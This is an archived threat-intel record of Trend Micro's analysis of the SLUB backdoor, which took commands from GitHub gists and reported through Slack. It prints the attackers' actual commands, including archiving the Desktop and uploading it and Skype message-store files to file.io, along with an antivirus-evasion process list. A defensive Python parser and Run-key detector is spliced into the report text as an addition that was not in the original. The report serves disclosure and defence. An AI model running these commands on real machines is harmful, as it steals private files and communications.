{
	"id": "c4120f7c-4771-4202-bbc5-1aa1e6c12a4d",
	"created_at": "2026-04-06T00:17:15.406549Z",
	"updated_at": "2026-04-10T03:23:51.100224Z",
	"deleted_at": null,
	"sha1_hash": "9ae5ad4e9bfcdcc01e8e556dd83321c179b152c8",
	"title": "New SLUB Backdoor Uses GitHub, Communicates via Slack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 86432,
	"plain_text": "New SLUB Backdoor Uses GitHub, Communicates via Slack\r\nPublished: 2019-03-07 · Archived: 2026-04-05 13:00:01 UTC\r\nWe recently came across a previously unknown malware that piqued our interest in multiple ways. For starters, we\r\ndiscovered it being spread via watering hole attacks, a technique that involves an attacker compromising a website\r\nbefore adding code to it so visitors are redirected to the infecting code. In this case, each visitor is redirected only\r\nonce. The infection was done by exploiting CVE-2018-8174, a VBScript engine vulnerability that was patched by\r\nMicrosoft back in May 2018.\r\nSecond, it uses a multi-stage infection scheme. After it exploits the vulnerability, it downloads a DLL and runs it\r\nin PowerShell (PS). This file, which is a downloader, then downloads and runs the second executable file\r\ncontaining a backdoor. The first stage downloader also checks for the existence of different kinds of antivirus\r\nsoftware processes, and then proceeds to exit if any is found. At the time of discovery, the backdoor was\r\nseemingly unknown to AV products.\r\nIn addition to the previously mentioned facts, we quickly noticed that the malware was connecting to the Slack\r\nplatform, a collaborative messaging system that lets users create and use their own workspaces through the use of\r\nchannels, similar to the IRC chatting system. 
We found this quite interesting, since we had not observed any\r\nmalware to date that communicates using Slack, although we have previously discussed how cybercriminals could\r\npossibly abuse chat platforms as part of their attacks.\r\nOur technical investigation and analysis of the attacker’s tools, techniques, and procedures (TTPs) leads us to think\r\nthat this threat is actually a stealthy targeted attack run by capable actors, and not a typical cybercriminal scheme.\r\nNote that as soon as this malware was discovered, we informed the Canadian Centre for Cyber Security, which\r\nacts as Canada’s National Computer Security Incident Response Team (CSIRT). The Cyber Centre alerted the site\r\noperator, helped them understand the malware that was found, and offered mitigation advice.\r\nInfection Chain\r\nFigure 1. The infection chain of the attack\r\nThe downloader\r\nThe downloader, which runs through PowerShell as a DLL, serves several purposes. The first is to download the\r\nsecond stage malware, which we called the SLUB (for SLack and githUB; detected as\r\nBackdoor.Win32.SLUB.A) backdoor, and execute it. The second purpose is to check whether any of the following antivirus\r\nprocesses are running:\r\nV3Tray.exe\r\nAYAgent.aye\r\nnavapsvc.exe\r\nashServ.exe\r\navgemc.exe\r\nbdagent.exe\r\nZhuDongFangYu.exe\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/\r\nPage 1 of 6\n\nIf the downloader finds one of these, it simply exits.\r\nFinally, the downloader also exploits the CVE-2015-1701 vulnerability to acquire local privilege escalation. The\r\nexploit's code was likely created by modifying code from a GitHub repository, which is shown in the image below.\r\nFigure 2. The unmodified code\r\nThe SLUB backdoor\r\nThe SLUB backdoor is a custom one written in C++, statically linking the curl library to\r\nperform multiple HTTP requests. 
Other statically linked libraries are Boost (for extracting commands from gist\r\nsnippets) and JsonCpp (for parsing Slack channel communication).\r\nThe malware also embeds two authorization tokens to communicate with the Slack API.\r\nIt copies itself to ProgramData\\update\\ and creates persistence via a Run registry key that calls the export\r\nfunction UpdateMPUnits with rundll32.exe. Note the typo in the value name, “Microsoft Setup\r\nInitializazion.”\r\nFigure 3. Screenshots of the Run registry key\r\nIt downloads a specific “gist” snippet from GitHub and parses it, looking for commands (which we will\r\ncover further in this entry) to execute. Only lines starting with “^” and ending with “$” will be executed;\r\nall other lines are ignored.\r\nFigure 4. The “gist” snippet that is downloaded from GitHub\r\nThe result of the commands is then posted to a private Slack channel in a particular workspace using the\r\nembedded tokens.\r\nNote that a side effect of this particular setup is that the attacker has no way to issue commands to a specific\r\ntarget: every infected computer executes whatever commands are enabled in the gist snippet at the time it checks it.\r\nFigure 5. 
Scheme of the backdoor communication, with the first arrow starting from the person who initiates the\r\nconnection\r\nBackdoor features\r\nThe backdoor supports the following commands and subcommands (most of them are self-explanatory).\r\nCommands, subcommands and parameters are separated with a comma “,”, as seen in Figure 4.\r\nCommand   Subcommand   Details\r\nexec      -            Execute a command with cmd.exe\r\ndnexec    -            Download and execute a command\r\nupdate    -            Download a file, remove the current one and run the downloaded file\r\ndestroy   -            Delete the malware from disk with a batch script\r\ncapture   -            Take a screenshot and send it to the Slack channel\r\nfile      list         List the specified file\r\nfile      copy         Copy the specified file\r\nfile      delete       Delete the specified file\r\nfile      upload       Upload a local file to the file.io website and post the download link to the Slack channel\r\ndir       create       Create a directory\r\ndir       remove       Remove a directory\r\nproc      list         List processes\r\nproc      kill         Terminate a process\r\ndrive     list         Get information about each volume of the current drive, such as free space, extended attributes, USN journal activation, and encryption state\r\nreg       query        Query a registry key\r\nreg       read         Read a registry key\r\nreg       write        Write a registry key\r\ntmout     -            Call the “sleep” function\r\nSlack communication function\r\nThe Slack communication function contains two hardcoded authentication tokens, split into a few smaller chunks.\r\nFigure 6. Code of the communication function\r\nLater, the backdoor gets the username and computer name (seen in Figure 7), then creates and uploads the Slack\r\nmessage into a channel. It uses the following API method to post messages:\r\nhttps://api.slack.com/methods/chat.postMessage\r\nFigure 7. 
Retrieving the username and computer name\r\nThe keywords “title,” “text,” “channel,” and “attachments” are clearly visible in the function listing.\r\nFigure 8. Function listing showing keywords\r\nThe output of every command is sent to a private Slack channel, while every command itself is sent to a different\r\nprivate Slack channel as an attachment with the text “*computername:username*”.\r\nThe attacker’s tools, techniques and procedures\r\nThe GitHub account and the Slack workspace were created specifically for the campaign on February 19 and 20,\r\nwhile we estimate that the attacker compiled the malware on February 22. The attacker added the first commands\r\nto GitHub on February 20. However, looking at the Slack channels, we can see that the attacker tested the malware\r\non February 23 and 24. The first victims were seen on February 27. The attackers' first actions involve getting\r\ncontext information to learn more about the computer they infected:\r\n^exec,tasklist$\r\n^capture$\r\n^drive,list$\r\n^file,list,C:\\Users\\$\r\n^reg,read,HKEY_CURRENT_USER,SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run$\r\nThey look for running processes, take screen captures, list drives on the machine, list all users, and check the\r\nmalware's persistence registry key. 
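\r\nThe gist format, the command table and the recon commands above are enough to reconstruct what a recovered gist would make an infected host do. The Python below is an added example written for this page, not code from the Trend Micro post or from the SLUB sample. It parses a gist the way the post says the backdoor does (only lines framed by ^ and $ count, commas separate command, subcommand and parameters), and a second helper flags Run-key values that match the persistence described earlier (the misspelled value name, rundll32 calling UpdateMPUnits, a DLL under ProgramData\\update). Assumptions: the grouping of commands into no-parameter, single-parameter and subcommand forms is reconstructed from the command table; the sample gist is constructed from the commands quoted in the post plus some deliberately malformed lines; the DLL file name in the sample Run entry is invented, since the post names only the directory.\r\n
```python
# Added example for this page, not code from the Trend Micro post or from the
# SLUB sample: a parser for the gist command format the post describes, plus a
# Run-key triage check for the persistence it documents.
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Command grouping reconstructed from the post's command table. Assumption: the
# single-parameter commands take one free-form string (a cmd.exe line, a URL, a
# sleep value) that may itself contain commas and so must not be split further.
SINGLE_PARAM = {'exec', 'dnexec', 'update', 'tmout'}
NO_PARAM = {'destroy', 'capture'}
SUBCOMMANDS = {
    'file': {'list', 'copy', 'delete', 'upload'},
    'dir': {'create', 'remove'},
    'proc': {'list', 'kill'},
    'drive': {'list'},
    'reg': {'query', 'read', 'write'},
}


@dataclass
class Command:
    name: str
    sub: Optional[str]
    params: List[str]
    raw: str


def parse_gist(text: str) -> List[Command]:
    '''Return the commands SLUB would run from a recovered gist: only a line
    framed by ^ and $ counts, everything else is ignored, and commas separate
    command, subcommand and parameters.'''
    commands = []
    for line in text.splitlines():
        line = line.strip()
        if len(line) < 3 or not (line.startswith('^') and line.endswith('$')):
            continue  # blank, comment or half-delimited line: skipped
        inner = line[1:-1]
        name, _, rest = inner.partition(',')
        name = name.lower()
        if name in SINGLE_PARAM:
            sub, params = None, ([rest] if rest else [])  # commas stay in the cmd line
        elif name in NO_PARAM:
            sub, params = None, []
        elif name in SUBCOMMANDS:
            sub, _, rest = rest.partition(',')
            sub = sub.lower()
            if sub not in SUBCOMMANDS[name]:
                continue  # unknown subcommand (e.g. a missing comma): skipped
            params = rest.split(',') if rest else []
        else:
            continue  # not a SLUB command: the backdoor has no handler for it
        commands.append(Command(name, sub, params, line))
    return commands


# Persistence indicators from the post: the misspelled value name, the export
# called through rundll32, and the drop directory.
PERSISTENCE_VALUE_NAME = 'Microsoft Setup Initializazion'


def flag_run_entries(entries: List[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    '''Flag (value_name, command_line) pairs read from a Run key that match
    the SLUB persistence; returns (value_name, command_line, reason) per hit.'''
    hits = []
    for value_name, cmd in entries:
        low = cmd.lower()
        if value_name.lower() == PERSISTENCE_VALUE_NAME.lower():
            hits.append((value_name, cmd, 'value name matches SLUB persistence'))
        elif 'rundll32' in low and 'updatempunits' in low:
            hits.append((value_name, cmd, 'rundll32 calls the UpdateMPUnits export'))
        elif '\\programdata\\update\\' in low:
            hits.append((value_name, cmd, 'autorun from ProgramData\\update'))
    return hits


# Constructed sample gist: recon commands quoted in the post plus lines the
# backdoor would ignore. The tmout value is made up.
SAMPLE_GIST = '\n'.join([
    'notes for later',  # no ^...$ framing
    '^exec,tasklist$',
    '^capture$',
    '^drive,list$',
    '^file,list,C:\\Users\\$',
    '^reg,read,HKEY_CURRENT_USER,SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run$',
    '^exec,cd C:\\Users\\USER & dir /s /b /a-d C:\\Users\\USER\\Desktop '
    '> C:\\Users\\USER\\win12 & makecab /d CabinetName1=win34 /f C:\\Users\\USER\\win12$',
    '^file,upload C:\\Users\\Admin\\AppData\\Roaming\\Skype\\DataRv\\offline-storage.data$',  # comma missing
    '^frobnicate,now$',  # not a SLUB command
    '^tmout,60',  # closing $ missing
])

# Constructed Run-key export; the SLUB DLL file name is invented.
SAMPLE_RUN = [
    ('OneDrive', 'C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background'),
    ('Microsoft Setup Initializazion', 'rundll32.exe C:\\ProgramData\\update\\sample.dll,UpdateMPUnits'),
]

if __name__ == '__main__':
    for c in parse_gist(SAMPLE_GIST):
        print(c.name, c.sub, c.params)
    for hit in flag_run_entries(SAMPLE_RUN):
        print('HIT', hit)
```
\r\nRun as a script it prints the six commands the backdoor would act on and the one flagged Run entry. On a live Windows host the (value name, command line) pairs can be read with winreg from the HKCU and HKLM Software\\Microsoft\\Windows\\CurrentVersion\\Run keys and passed to flag_run_entries unchanged. Note that the post's Skype upload lines lack the comma after “upload”; this parser drops them as malformed, and the post does not say how the implant itself handled that case.\r\n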
They will also usually list some known directories:\r\n^exec,dir /s C:\\Users\\USER\\Desktop\\$\r\n^exec,dir /s C:\\Users\\USER\\Downloads\\$\r\n^exec,dir /s C:\\Users\\USER\\Recent\\$\r\nSome commands caught our interest, such as one that allows the attacker to create an archive file of the user's\r\nentire Desktop folder, which is then exfiltrated:\r\n^exec,powershell -Command compress-archive -path C:\\Users\\USER\\Desktop -destinationpath C:\\Users\\USER\\doc1$\r\n^file,upload,C:\\Users\\USER\\doc1$\r\nThe following command allows an attacker to build a CAB file containing the file tree of the user’s Desktop:\r\n^exec,cd C:\\Users\\USER & dir /s /b /a-d C:\\Users\\USER\\Desktop > C:\\Users\\USER\\win12 & makecab /d CabinetName1=win34 /f C:\\Users\\USER\\win12$\r\nThe attacker is also seemingly interested in the files that make up Skype's local message store (the -shm and -wal files are the SQLite write-ahead-log companions of the main database):\r\n^file,upload C:\\Users\\Admin\\AppData\\Roaming\\Skype\\DataRv\\offline-storage-ecs.data$\r\n^file,upload C:\\Users\\Admin\\AppData\\Roaming\\Skype\\DataRv\\offline-storage.data$\r\n^file,upload C:\\Users\\Admin\\AppData\\Roaming\\Skype\\DataRv\\offline-storage.data-shm$\r\n^file,upload C:\\Users\\Admin\\AppData\\Roaming\\Skype\\DataRv\\offline-storage.data-wal$\r\nThe attacker also copies all HWP files (the Hangul Word Processor format, widely used in Korea) to a specific directory:\r\n^exec,copy C:\\Users\\USER\\Desktop\\*.hwp C:\\Users\\USER\\oo$\r\nThe attacker likely planned to exfiltrate this directory; however, we did not see any commands for this. We also\r\nnoted a specific interest in a software package called “Neologic Plus Board,” which seems to be used for the administration\r\nof bulletin board systems. 
Some of the files that the attackers retrieved contained hundreds of BBS URLs.\r\nWe also noticed that most of the files uploaded to file.io had already been deleted when we tried to retrieve them\r\n(file.io removes a file after its first download by default, so the attacker's own retrieval is enough to make it unavailable).\r\nBased on the commands run by the attackers, we theorize that they are looking for people-related information. The\r\nattackers want to know more about the targeted victims’ communications. Thus, they dig into activities on Twitter,\r\nSkype, KakaoTalk, BBS, and possibly more communication systems, in addition to collecting the HWP files.\r\nThis timeline of events shows the speed with which the threat actors launched the attack:\r\nFigure 9. Timeline of events\r\nConclusion\r\nPerhaps the most distinctive aspect of this campaign is that it makes use of three different online services to issue\r\ncommands, get the results, and retrieve files from compromised hosts.\r\nOur investigation leads us to believe, with strong confidence, that this was part of a targeted attack campaign.\r\nSo far, we have not been able to find related attacks, and have not spotted the custom backdoor elsewhere. We\r\nhave been searching for similar samples and have found none so far, which is a strong indication that the attackers\r\neither developed the malware themselves or got it from a private developer who has not publicly leaked it.\r\nThe commands that the attackers ran clearly show a strong interest in person-related information, with a special\r\nfocus on communication software, in an attempt to learn more about the people behind the computers they\r\ninfected.\r\nThe attackers also appear to be professionals, based on their way of handling their attack. 
They only use public\r\nthird-party services, and therefore did not need to register any domains or anything else that could leave a trail.\r\nThe few email addresses we found during the investigation also used disposable email services, giving the\r\nattackers a clean footprint. Finally, the watering hole chosen by the attackers can be considered interesting for\r\nthose who follow political activities, which might give a glimpse into the nature of the groups and individuals that\r\nthe attackers are targeting.\r\nWe would like to thank GitHub’s SIRT and Slack’s security teams for quickly removing the related files, which\r\neffectively cut the communication between the attackers and their malware.\r\nIn response to this incident, Slack replied with the following: As noted in their post, Trend Micro recently\r\ndiscovered a third party’s unauthorized access of another third party’s computer using malware, and reported to\r\nus the existence of a Workspace on Slack related to this effort. We investigated and immediately shut down the\r\nsingle Workspace as a violation of our terms of service, and we confirmed that Slack was not compromised in any\r\nway as part of this incident. We are committed to preventing the misuse of our platform and we will take action\r\nagainst anyone who violates our terms of service.\r\nIndicators of Compromise (IoCs):\r\nSHA-256 hashes:\r\n3ba00114d0ae766cf77edcdcc953ec6ee7527181968c02d4ffc36b9f89c4ebc7 (Trojan.Win32.CVE20151701.E)\r\n43221eb160733ea694b4fdda70e7eab4a86d59c5f9749fd2f9b71783e5da6dd7 (Backdoor.Win32.SLUB.A)\r\nURLs:\r\nhxxps://gist.github[.]com/kancc14522/626a3a68a2cc2a91c1ece1eed7610c8a\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/"
	],
	"report_names": [
		"new-slub-backdoor-uses-github-communicates-via-slack"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434635,
	"ts_updated_at": 1775791431,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9ae5ad4e9bfcdcc01e8e556dd83321c179b152c8.pdf",
		"text": "https://archive.orkl.eu/9ae5ad4e9bfcdcc01e8e556dd83321c179b152c8.txt",
		"img": "https://archive.orkl.eu/9ae5ad4e9bfcdcc01e8e556dd83321c179b152c8.jpg"
	}
}